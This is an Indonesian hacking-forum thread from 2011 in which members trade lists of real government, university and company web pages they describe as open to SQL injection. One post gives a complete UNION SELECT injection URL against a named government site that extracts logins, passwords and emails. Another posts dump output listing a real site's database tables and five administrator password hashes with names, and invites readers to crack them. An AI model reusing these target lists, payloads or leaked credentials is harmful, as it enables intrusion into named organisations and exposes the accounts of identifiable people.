kumpulan : Vuln WEB LOKAL, Masuk Sini..

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Sat Mar 12, 2011 8:22 am

t3g0h wrote:Laporan untuk yang ke sekian kalinya :D

Code: Select all

http://www.wonogirikab.go.id/home.php?mode=content&submode=detail&id=1475'
http://www.insco.co.id/berita.php?id=1'
http://www.mstrifm.com/berita.php?id=-99
tabun wrote:

Code: Select all

http://www.selular.co.id/modberita/printview.php?cat=BNews&textid=246'
coba aja gan,,,, :pusing:
mantep nih dua2na..:p
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
pras80
Posts: 54
Joined: Sat Sep 29, 2007 1:26 am
Location: end of the world
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by pras80 » Sat Mar 12, 2011 1:20 pm

tabun wrote:

Code: Select all

http://www.selular.co.id/modberita/printview.php?cat=BNews&textid=246'
coba aja gan,,,, :pusing:
wew..ane coba pake schemafuzz ga bisa...
[+] URL: http://www.selular.co.id/modberita/prin ... at=BNews--
[+] Evasion Used: "+" "--"
[+] 13:16:54
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,
[!] Sorry Column Length could not be found.
[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!
[-] Done

mohon pencerahannya..
mbil nunggu mastah j0ck3r
http://sekilapinfo.com & http://sekilap.info
Menuntut ilmu dari ayunan sampai liang lahat

User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Sat Mar 12, 2011 4:19 pm

pras80 wrote:
tabun wrote:

Code: Select all

http://www.selular.co.id/modberita/printview.php?cat=BNews&textid=246'
coba aja gan,,,, :pusing:
wew..ane coba pake schemafuzz ga bisa...
[+] URL: http://www.selular.co.id/modberita/prin ... at=BNews--
[+] Evasion Used: "+" "--"
[+] 13:16:54
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,
[!] Sorry Column Length could not be found.
[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!
[-] Done

mohon pencerahannya..
mbil nunggu mastah j0ck3r
Target: http://www.selular.co.id/modberita/prin ... textid=246
Date: 3/12/2011 4:08:25 PM
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
tipscontents
textcontents
textcategories
tempmembers
tblprovince
tblkota
suratcontents
selularcontentsprice
selularcontents
selularcommcontent
selularcategories
selularbuyerscontents
polingcontenttext
polingcontentnametext
polingcontentname
polingcontent
poling
ordercontents
newslettertemp
menu_page
members
majalahcontents
komentarcontent
imagecataloggallery
imagecatalog
iklancontents
galleryselularbuyers
galleryselular
galleryimages
galleryberita
galleries
files
embedcatalog
direktoricontents
countries
config
beritacontents
banners
admin
isinya adalah:
14ac4fda402e729ba575537616f8ccff (pass):Aditya(user name)
3006fce853c837e005ba0d3a881db36d (pass:Rickyonline (user name)
5777ee06bb5471fe50f7191e6fd9a443(pass) :Admin Selular (user name)
9ccaf4e36bb19bd8beab2a1e8f1731cf (pass) :Iman Maulana (user name)
a660b4a56bd256fb87c80f5c6c2cd112 (pass):Deni (username)

monggo silahkan di crack
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
tabun
Posts: 41
Joined: Mon Nov 15, 2010 1:28 pm

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by tabun » Sat Mar 12, 2011 4:37 pm

pras80 wrote:
tabun wrote:

Code: Select all

http://www.selular.co.id/modberita/printview.php?cat=BNews&textid=246'
coba aja gan,,,, :pusing:
wew..ane coba pake schemafuzz ga bisa...
[+] URL: http://www.selular.co.id/modberita/prin ... at=BNews--
[+] Evasion Used: "+" "--"
[+] 13:16:54
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,
[!] Sorry Column Length could not be found.
[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!
[-] Done

mohon pencerahannya..
mbil nunggu mastah j0ck3r
enakan manual gan,,,,,, :kaca:
j0ck3r wrote: Target: http://www.selular.co.id/modberita/prin ... textid=246
Date: 3/12/2011 4:08:25 PM
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
tipscontents
textcontents
textcategories
tempmembers
tblprovince
tblkota
suratcontents
selularcontentsprice
selularcontents
selularcommcontent
selularcategories
selularbuyerscontents
polingcontenttext
polingcontentnametext
polingcontentname
polingcontent
poling
ordercontents
newslettertemp
menu_page
members
majalahcontents
komentarcontent
imagecataloggallery
imagecatalog
iklancontents
galleryselularbuyers
galleryselular
galleryimages
galleryberita
galleries
files
embedcatalog
direktoricontents
countries
config
beritacontents
banners
admin
isinya adalah:
14ac4fda402e729ba575537616f8ccff (pass):Aditya(user name)
3006fce853c837e005ba0d3a881db36d (pass:Rickyonline (user name)
5777ee06bb5471fe50f7191e6fd9a443(pass) :Admin Selular (user name)
9ccaf4e36bb19bd8beab2a1e8f1731cf (pass) :Iman Maulana (user name)
a660b4a56bd256fb87c80f5c6c2cd112 (pass):Deni (username)

monggo silahkan di crack
tuh bang joker bisa,,,,, :malumalu:
tapi gax dapet hal admin :pusing:
orang cupu mau belajar

User avatar
tabun
Posts: 41
Joined: Mon Nov 15, 2010 1:28 pm

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by tabun » Sat Mar 12, 2011 5:39 pm

Code: Select all

http://www.disperindagbali.go.id/includes/lengkap1.php?%20id=51+and+1=0+union+all+select+1,0x746162756e5f677563695f6e756d70616e675f6e6f6e676b726f6e675f64695f62616c69,3,4,group_concat(Username,0x3a,Password,0x3a,Email),6+from+login--
bug lma yg terabaikan,,,,, :pusing:
orang cupu mau belajar

User avatar
pras80
Posts: 54
Joined: Sat Sep 29, 2007 1:26 am
Location: end of the world
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by pras80 » Sat Mar 12, 2011 11:14 pm

tabun wrote:

Code: Select all

http://www.disperindagbali.go.id/includes/lengkap1.php?%20id=51+and+1=0+union+all+select+1,0x746162756e5f677563695f6e756d70616e675f6e6f6e676b726f6e675f64695f62616c69,3,4,group_concat(Username,0x3a,Password,0x3a,Email),6+from+login--
bug lma yg terabaikan,,,,, :pusing:
wew..iyaa tuh..kok lum di patch juga yaa....coba ke TKP ahh...:ngakak:
buat omz j0ck3r...mantqabs omz...:love:
http://sekilapinfo.com & http://sekilap.info
Menuntut ilmu dari ayunan sampai liang lahat

User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Sun Mar 13, 2011 12:18 am

yang suka ice cream...

Code: Select all

http://202.155.27.137/campina.co.id/ujicoba/news.asp?id=24
:ngakak: :ngakak:
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Sun Mar 13, 2011 1:45 am

Code: Select all

http://www.suryalaya.org/berita.php?ID=442'
http://m.depok.go.id/berita.php?id=453'
http://www.pacitankab.go.id/berita/berita.php?id=486'
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Sun Mar 13, 2011 2:49 am

waduh..maap ya om-om admin,ane jadi repost melulu..soalnya gak bisa ngedit sih

Code: Select all

http://im.ugm.ac.id/berita.php?post_id=17'
http://www.kejari-jaksel.go.id/berita.php?news=238'
http://www.rni.co.id/berita.php?module=detailberita&id=1141'
http://www.nebeng.com/berita.php?id=7'
http://pustaka.litbang.deptan.go.id/berita.php?newsID=b070729'
http://www.dinus.ac.id/pps/detail-berita.php?id=3'
http://www.asper-honda.com/berita/det-berita.php?id=38&jns=A
http://www.tzuchi.or.id/view_berita.php?id=1866'
buat temen-temen,maapin ane ya udah dobel post mlulu..he he he
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
tabun
Posts: 41
Joined: Mon Nov 15, 2010 1:28 pm

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by tabun » Tue Mar 15, 2011 5:46 pm

j0ck3r wrote:waduh..maap ya om-om admin,ane jadi repost melulu..soalnya gak bisa ngedit sih

Code: Select all

http://im.ugm.ac.id/berita.php?post_id=17'
http://www.kejari-jaksel.go.id/berita.php?news=238'
http://www.rni.co.id/berita.php?module=detailberita&id=1141'
http://www.nebeng.com/berita.php?id=7'
http://pustaka.litbang.deptan.go.id/berita.php?newsID=b070729'
http://www.dinus.ac.id/pps/detail-berita.php?id=3'
http://www.asper-honda.com/berita/det-berita.php?id=38&jns=A
http://www.tzuchi.or.id/view_berita.php?id=1866'
buat temen-temen,maapin ane ya udah dobel post mlulu..he he he
om j0ck3r ganas dah,,,,
nih ane sumbang bug lama

Code: Select all

http://www.puteri-indonesia.com/web/photo_detail.php?id_galpg=132
orang cupu mau belajar

Post Reply

Return to “Web Hacking”